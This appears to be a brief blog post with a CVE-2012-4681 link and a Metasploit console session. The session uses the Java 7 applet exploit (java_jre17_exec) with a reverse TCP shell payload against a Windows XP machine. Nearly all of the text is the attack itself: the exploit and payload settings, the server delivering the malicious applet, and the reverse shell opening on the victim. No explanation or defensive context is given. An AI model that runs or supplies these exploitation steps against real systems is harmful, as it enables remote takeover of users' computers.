http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-4681
Metasploit
#msfconsolemsf >use exploit/multi/browser/java_jre17_execmsf exploit(java_jre17_exec) >set payload java/shell/reverse_tcpmsf exploit(java_jre17_exec) >set srvhost 192.168.0.2msf exploit(java_jre17_exec) >set lhost 192.168.0.2msf exploit(java_jre17_exec) >exploit[*] Exploit running as background job. [*] Started reverse handler on 192.168.0.2:4444 msf exploit(java_jre17_exec) > [*] Using URL: http://192.168.0.2:8080/UxFhxobmVYzm [*] Server started. [*] 192.168.0.1 java_jre17_exec - Java 7 Applet Remote Code Execution handling request [*] 192.168.0.1 java_jre17_exec - Sending Applet.jar [*] 192.168.0.1 java_jre17_exec - Sending Applet.jar [*] 192.168.0.1 java_jre17_exec - Sending Applet.jar [*] Sending stage (2976 bytes) to 192.168.0.1 [*] Command shell session 1 opened (192.168.0.2:4444 -> 192.168.0.1:1139) msf exploit(java_jre17_exec) >sessions -i 1[*] Starting interaction with 1... Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\User\Desktop>
No comments:
Post a Comment